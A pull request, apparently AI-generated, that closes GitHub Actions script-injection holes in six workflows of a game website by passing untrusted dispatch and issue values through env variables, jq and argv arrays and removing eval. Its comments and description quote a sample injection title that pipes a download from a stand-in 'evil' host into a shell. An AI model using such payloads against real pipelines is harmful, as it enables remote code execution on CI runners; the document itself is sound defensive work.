### PR TITLE
security(ci): close GitHub Actions script-injection across 6 workflows

### DIFF
--- a/.github/workflows/bug-report.yml
+++ b/.github/workflows/bug-report.yml
@@ -236,10 +236,12 @@ jobs:
       - name: Assign Maintainers
         if: steps.create-issue.outputs.action == 'created'
         uses: actions/github-script@v7
+        env:
+          ISSUE_NUMBER: ${{ steps.create-issue.outputs.issue_number }}
         with:
           github-token: ${{ github.token }}
           script: |
-            const issueNumber = ${{ steps.create-issue.outputs.issue_number }};
+            const issueNumber = Number(process.env.ISSUE_NUMBER);
             const maintainers = ['PipFoweraker']; // Add other maintainers as needed
             
             try {
@@ -268,15 +270,29 @@ jobs:
             }
 
       - name: Generate Run Log Summary
+        # Untrusted values (client_payload originates from the bug form) enter via
+        # env: and are read as DATA -- `echo "$VAR"` prints them literally, so a
+        # payload like `x"; curl evil|sh; echo "` can no longer break out of the
+        # shell. github.run_id/server_url/repository are GitHub-controlled, so they
+        # stay inline. (Was: user fields spliced straight into the run: text.)
+        env:
+          RPT_TYPE: ${{ github.event.client_payload.type || github.event.inputs.type || 'bug' }}
+          RPT_SOURCE: ${{ github.event.client_payload.source || github.event.inputs.source || 'web' }}
+          RPT_DEDUPE: ${{ github.event.client_payload.dedupeKey || 'N/A' }}
+          RPT_ACTION: ${{ steps.create-issue.outputs.action }}
+          RPT_ISSUE_NUMBER: ${{ steps.create-issue.outputs.issue_number }}
+          RPT_ISSUE_URL: ${{ steps.create-issue.outputs.issue_url }}
         run: |
-          echo "## Bug Report Workflow Summary" >> $GITHUB_STEP_SUMMARY
-          echo "- **Action**: ${{ steps.create-issue.outputs.action }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Issue Number**: #${{ steps.create-issue.outputs.issue_number }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Issue URL**: ${{ steps.create-issue.outputs.issue_url }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Type**: ${{ github.event.client_payload.type || github.event.inputs.type || 'bug' }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Source**: ${{ github.event.client_payload.source || github.event.inputs.source || 'web' }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **DedupeKey**: ${{ github.event.client_payload.dedupeKey || 'N/A' }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Workflow Run**: [${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" >> $GITHUB_STEP_SUMMARY
+          {
+            echo "## Bug Report Workflow Summary"
+            echo "- **Action**: $RPT_ACTION"
+            echo "- **Issue Number**: #$RPT_ISSUE_NUMBER"
+            echo "- **Issue URL**: $RPT_ISSUE_URL"
+            echo "- **Type**: $RPT_TYPE"
+            echo "- **Source**: $RPT_SOURCE"
+            echo "- **DedupeKey**: $RPT_DEDUPE"
+            echo "- **Workflow Run**: [${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})"
+          } >> "$GITHUB_STEP_SUMMARY"
 
   notify:
     needs: create-issue
@@ -284,9 +300,16 @@ jobs:
     if: ${{ (github.event.client_payload && github.event.client_payload.notify == true) || (github.event.inputs && github.event.inputs.notify == 'true') }}
     steps:
       - name: Send Notification
+        # Same fix: the bug-form title/type are untrusted and must not reach the
+        # shell as code. Read via env and echo as data.
+        env:
+          NOTIFY_TITLE: ${{ github.event.client_payload.title || github.event.inputs.title }}
+          NOTIFY_TYPE: ${{ github.event.client_payload.type || github.event.inputs.type || 'bug' }}
+          NOTIFY_ISSUE_NUMBER: ${{ needs.create-issue.outputs.issue_number }}
+          NOTIFY_ISSUE_URL: ${{ needs.create-issue.outputs.issue_url }}
         run: |
-          echo "🐛 New bug report received!"
-          echo "📋 Issue: #${{ needs.create-issue.outputs.issue_number }}"
-          echo "🔗 URL: ${{ needs.create-issue.outputs.issue_url }}"
-          echo "📝 Title: ${{ github.event.client_payload.title || github.event.inputs.title }}"
-          echo "🏷️ Type: ${{ github.event.client_payload.type || github.event.inputs.type || 'bug' }}"
+          echo "New bug report received!"
+          echo "Issue: #$NOTIFY_ISSUE_NUMBER"
+          echo "URL: $NOTIFY_ISSUE_URL"
+          echo "Title: $NOTIFY_TITLE"
+          echo "Type: $NOTIFY_TYPE"

--- a/.github/workflows/post-issue-to-forum.yml
+++ b/.github/workflows/post-issue-to-forum.yml
@@ -74,29 +74,28 @@ jobs:
       - name: Format issue for forum
         if: steps.check_labels.outputs.skip == 'false'
         id: format
+        # Untrusted issue fields (title/body/author/...) enter via env and are only
+        # ever treated as DATA: printf'd into post_body.md, never spliced into the
+        # shell text. The next step reads the title from env too and builds JSON
+        # with `jq --arg`, so the title cannot become shell or JSON syntax.
+        # (Was: TITLE="${{ issue.title }}" -- a title of `";curl evil|sh;echo "` ran.)
+        env:
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_BODY: ${{ github.event.issue.body }}
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
+          ISSUE_URL: ${{ github.event.issue.html_url }}
+          ISSUE_AUTHOR: ${{ github.event.issue.user.login }}
+          ISSUE_CREATED: ${{ github.event.issue.created_at }}
         run: |
-          # Prepare forum post content
-          TITLE="${{ github.event.issue.title }}"
-
-          # Create forum post body with GitHub issue link
-          cat > post_body.md <<'EOFMARKER'
-          **Original GitHub Issue**: [#${{ github.event.issue.number }}](${{ github.event.issue.html_url }})
-          **Author**: @${{ github.event.issue.user.login }}
-          **Created**: ${{ github.event.issue.created_at }}
-
-          ---
-
-          ${{ github.event.issue.body }}
-
-          ---
-
-          💬 **Discuss this issue on the forum or [view it on GitHub](${{ github.event.issue.html_url }})**
-
-          _This post was automatically created from a GitHub issue._
-          EOFMARKER
-
-          # Save title and body to output
-          echo "title=$TITLE" >> $GITHUB_OUTPUT
+          {
+            printf '**Original GitHub Issue**: [#%s](%s)\n' "$ISSUE_NUMBER" "$ISSUE_URL"
+            printf '**Author**: @%s\n' "$ISSUE_AUTHOR"
+            printf '**Created**: %s\n\n---\n\n' "$ISSUE_CREATED"
+            printf '%s\n\n' "$ISSUE_BODY"
+            printf -- '---\n\n'
+            printf 'Discuss this issue on the forum or [view it on GitHub](%s)\n\n' "$ISSUE_URL"
+            printf '_This post was automatically created from a GitHub issue._\n'
+          } > post_body.md
           echo "Body formatted and saved to post_body.md"
 
       - name: Post to NodeBB forum
@@ -105,23 +104,24 @@ jobs:
         env:
           NODEBB_API_URL: ${{ secrets.NODEBB_API_URL || 'http://208.113.200.215:4567/api/v3' }}
           NODEBB_API_TOKEN: ${{ secrets.NODEBB_API_TOKEN }}
+          CATEGORY_CID: ${{ steps.category.outputs.cid }}
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_NUMBER: ${{ github.event.issue.number }}
         run: |
-          # Read formatted body
           BODY=$(cat post_body.md)
+          # Build the JSON with jq so the untrusted title/body are inserted as JSON
+          # DATA (--arg / --argjson), never as shell or JSON syntax spliced by ${{ }}.
+          PAYLOAD=$(jq -n \
+            --argjson cid "${CATEGORY_CID:-4}" \
+            --arg title "$ISSUE_TITLE" \
+            --arg content "$BODY" \
+            --arg tag "issue-${ISSUE_NUMBER}" \
+            '{cid: $cid, title: $title, content: $content, tags: ["github", $tag]}')
 
-          # Post to NodeBB via API
-          RESPONSE=$(curl -X POST "${NODEBB_API_URL}/topics" \
+          RESPONSE=$(curl -sS -X POST "${NODEBB_API_URL}/topics" \
             -H "Authorization: Bearer ${NODEBB_API_TOKEN}" \
             -H "Content-Type: application/json" \
-            -d @- <<JSONEOF
-          {
-            "cid": ${{ steps.category.outputs.cid }},
-            "title": "${{ steps.format.outputs.title }}",
-            "content": $(echo "$BODY" | jq -Rs .),
-            "tags": ["github", "issue-${{ github.event.issue.number }}"]
-          }
-          JSONEOF
-          )
+            -d "$PAYLOAD")
 
           echo "NodeBB Response: $RESPONSE"
 

--- a/.github/workflows/sync-design-notes.yml
+++ b/.github/workflows/sync-design-notes.yml
@@ -42,12 +42,17 @@ jobs:
 
       - name: Resolve game ref
         id: ref
+        # The ref can arrive from a dispatch payload (untrusted); read it via env so
+        # it is data, not shell. github.event_name is a trusted GitHub enum.
+        env:
+          INPUT_REF: ${{ github.event.inputs.ref }}
+          CP_REF: ${{ github.event.client_payload.ref }}
         run: |
           set -euo pipefail
           if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
-            REF="${{ github.event.inputs.ref }}"
+            REF="${INPUT_REF:-}"
           elif [ "${{ github.event_name }}" = "repository_dispatch" ]; then
-            REF="${{ github.event.client_payload.ref }}"
+            REF="${CP_REF:-}"
           else
             REF=""
           fi

--- a/.github/workflows/sync-design-tokens.yml
+++ b/.github/workflows/sync-design-tokens.yml
@@ -50,15 +50,19 @@ jobs:
           cat public/design/tokens.json
           
       - name: Commit changes
+        # The ref (used only in the commit message) can come from a dispatch
+        # payload; read via env so a crafted ref can't reach the shell as code.
+        env:
+          REF_RAW: ${{ github.event.inputs.ref || github.event.client_payload.ref || 'main' }}
         run: |
           git config user.name "github-actions[bot]"
           git config user.email "github-actions[bot]@users.noreply.github.com"
-          
+
           if git diff --quiet public/design/tokens.json; then
             echo "No changes to tokens.json"
           else
             git add public/design/tokens.json
-            REF="${{ github.event.inputs.ref || github.event.client_payload.ref || 'main' }}"
+            REF="${REF_RAW:-main}"
             git commit -m "chore(design): sync tokens.json from pdoom1@${REF}"
             git push
             echo "Tokens updated and committed"

--- a/.github/workflows/sync-pdoom1-docs.yml
+++ b/.github/workflows/sync-pdoom1-docs.yml
@@ -45,15 +45,19 @@ jobs:
 
       - name: Determine ref to sync
         id: get_ref
+        # Refs from a dispatch payload are untrusted; read via env, echo as data.
+        env:
+          INPUT_REF: ${{ github.event.inputs.ref }}
+          CP_REF: ${{ github.event.client_payload.ref }}
         run: |
           if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
-            echo "ref=${{ github.event.inputs.ref }}" >> $GITHUB_OUTPUT
+            echo "ref=${INPUT_REF:-main}" >> "$GITHUB_OUTPUT"
           elif [ "${{ github.event_name }}" = "repository_dispatch" ]; then
-            echo "ref=${{ github.event.client_payload.ref || 'main' }}" >> $GITHUB_OUTPUT
+            echo "ref=${CP_REF:-main}" >> "$GITHUB_OUTPUT"
           else
             # Get latest release tag
             LATEST=$(curl -s https://api.github.com/repos/PipFoweraker/pdoom1/releases/latest | jq -r .tag_name)
-            echo "ref=${LATEST:-main}" >> $GITHUB_OUTPUT
+            echo "ref=${LATEST:-main}" >> "$GITHUB_OUTPUT"
           fi
 
       - name: Checkout pdoom1 repo

--- a/.github/workflows/update-game-status.yml
+++ b/.github/workflows/update-game-status.yml
@@ -54,70 +54,53 @@ jobs:
 
       - name: Update game status from repository dispatch
         if: github.event_name == 'repository_dispatch'
+        # Every value is cross-repo dispatch payload = UNTRUSTED (a release version
+        # or warning can carry shell metacharacters -- the 2026-07-26 backtick-in-
+        # release-body bug proved this class is live). Read via env, build an argv
+        # ARRAY (never a string), exec node directly. The old code spliced the raw
+        # payload into a string AND `eval`'d it -- arbitrary command execution.
+        env:
+          CP_VERSION: ${{ github.event.client_payload.version }}
+          CP_STATUS: ${{ github.event.client_payload.status }}
+          CP_WARNING: ${{ github.event.client_payload.warning }}
+          CP_PHASE: ${{ github.event.client_payload.phase }}
+          CP_PROGRESS: ${{ github.event.client_payload.progress }}
+          CP_FETCH_RELEASE: ${{ github.event.client_payload.fetch_release }}
         run: |
           cd scripts
-          args=""
-          
-          # Parse payload from repository dispatch
-          if [ -n "${{ github.event.client_payload.version }}" ]; then
-            args="$args --version ${{ github.event.client_payload.version }}"
-          fi
-          
-          if [ -n "${{ github.event.client_payload.status }}" ]; then
-            args="$args --status ${{ github.event.client_payload.status }}"
-          fi
-          
-          if [ -n "${{ github.event.client_payload.warning }}" ]; then
-            args="$args --warning '${{ github.event.client_payload.warning }}'"
-          fi
-          
-          if [ -n "${{ github.event.client_payload.phase }}" ]; then
-            args="$args --phase '${{ github.event.client_payload.phase }}'"
-          fi
-          
-          if [ -n "${{ github.event.client_payload.progress }}" ]; then
-            args="$args --progress '${{ github.event.client_payload.progress }}'"
-          fi
-          
-          if [ "${{ github.event.client_payload.fetch_release }}" = "true" ]; then
-            args="$args --fetch-release"
-          fi
-          
-          echo "Running: node update-game-status.js $args"
-          eval "node update-game-status.js $args"
+          args=()
+          [ -n "$CP_VERSION" ]  && args+=(--version "$CP_VERSION")
+          [ -n "$CP_STATUS" ]   && args+=(--status "$CP_STATUS")
+          [ -n "$CP_WARNING" ]  && args+=(--warning "$CP_WARNING")
+          [ -n "$CP_PHASE" ]    && args+=(--phase "$CP_PHASE")
+          [ -n "$CP_PROGRESS" ] && args+=(--progress "$CP_PROGRESS")
+          [ "$CP_FETCH_RELEASE" = "true" ] && args+=(--fetch-release)
+          echo "Running update-game-status.js with ${#args[@]} args"
+          node update-game-status.js "${args[@]}"
 
       - name: Update game status from manual workflow
         if: github.event_name == 'workflow_dispatch'
+        # workflow_dispatch inputs are maintainer-only, but the same argv-array /
+        # no-eval pattern is used here too -- so there is no `eval` left in the file
+        # to copy from, and a value with a quote/backtick can't break the command.
+        env:
+          IN_VERSION: ${{ github.event.inputs.version }}
+          IN_STATUS: ${{ github.event.inputs.status }}
+          IN_WARNING: ${{ github.event.inputs.warning }}
+          IN_PHASE: ${{ github.event.inputs.phase }}
+          IN_PROGRESS: ${{ github.event.inputs.progress }}
+          IN_FETCH_RELEASE: ${{ github.event.inputs.fetch_release }}
         run: |
           cd scripts
-          args=""
-          
-          if [ -n "${{ github.event.inputs.version }}" ]; then
-            args="$args --version ${{ github.event.inputs.version }}"
-          fi
-          
-          if [ -n "${{ github.event.inputs.status }}" ]; then
-            args="$args --status ${{ github.event.inputs.status }}"
-          fi
-          
-          if [ -n "${{ github.event.inputs.warning }}" ]; then
-            args="$args --warning '${{ github.event.inputs.warning }}'"
-          fi
-          
-          if [ -n "${{ github.event.inputs.phase }}" ]; then
-            args="$args --phase '${{ github.event.inputs.phase }}'"
-          fi
-          
-          if [ -n "${{ github.event.inputs.progress }}" ]; then
-            args="$args --progress '${{ github.event.inputs.progress }}'"
-          fi
-          
-          if [ "${{ github.event.inputs.fetch_release }}" = "true" ]; then
-            args="$args --fetch-release"
-          fi
-          
-          echo "Running: node update-game-status.js $args"
-          eval "node update-game-status.js $args"
+          args=()
+          [ -n "$IN_VERSION" ]  && args+=(--version "$IN_VERSION")
+          [ -n "$IN_STATUS" ]   && args+=(--status "$IN_STATUS")
+          [ -n "$IN_WARNING" ]  && args+=(--warning "$IN_WARNING")
+          [ -n "$IN_PHASE" ]    && args+=(--phase "$IN_PHASE")
+          [ -n "$IN_PROGRESS" ] && args+=(--progress "$IN_PROGRESS")
+          [ "$IN_FETCH_RELEASE" = "true" ] && args+=(--fetch-release)
+          echo "Running update-game-status.js with ${#args[@]} args"
+          node update-game-status.js "${args[@]}"
 
       - name: Commit and push changes
         run: |


### PR DESCRIPTION
Relayed from the pdoom1 session via Pip (cross-repo protocol v1). pdoom1 fixed this class on their side today (their PR #933); this is the website-side sweep.

## The class
GitHub Actions substitutes `${{ }}` into `run:`/`script:` **text before the shell/interpreter runs**, so any user-authored or cross-repo-dispatch value templated inline is executable code, not data. A bug-form title of `` "; curl evil | sh; echo " `` — or a release version carrying backticks — runs.

## Fixed (6 workflows)
| Workflow | Vector | Reachability |
|---|---|---|
| `bug-report.yml` | `client_payload.type/source/dedupeKey/title` in two `run:` shell steps | **Live** — active `repository_dispatch` |
| `update-game-status.yml` | both steps built a shell arg-string from raw payload/inputs and **`eval`'d** it | Live (dispatch) + manual |
| `post-issue-to-forum.yml` | issue title in a shell assignment + an unquoted JSON heredoc | Latent — issues trigger removed 2026-07-22; hardened so re-enabling is safe |
| `sync-design-notes.yml` / `sync-pdoom1-docs.yml` / `sync-design-tokens.yml` | dispatch `ref` spliced into shell/`echo` | Dispatch |

## Fix pattern (house style, matches pdoom1 #933)
- Untrusted context → `env:` var, read as quoted `"$VAR"` (data, not code).
- JSON built with `jq --arg` / `--argjson`, never string-spliced.
- Command args as a bash **argv array** (`node x "${args[@]}"`) — **`eval` removed entirely** (0 left).
- The main `bug-report.yml` issue-creation step was already safe — it reads `context.payload.client_payload` as JS data.

## Deliberately left inline (verified safe / lower priority)
- `contains(github.event.issue.labels.*.name, …)` — evaluates **server-side to a boolean** before the shell runs; no user text reaches the shell.
- Remaining `${{ inputs.* }}` in other workflows are `workflow_dispatch` inputs (maintainer-only, not attacker-reachable). Follow-up hygiene, not a live vector.

## Verify
- All 27 workflows still parse as YAML; `eval` count is 0.
- No untrusted context (`issue`/`comment`/`client_payload`/`pull_request`/`head_ref`) remains in a shell-splice position.

🤖 Generated with [Claude Code](https://claude.com/claude-code)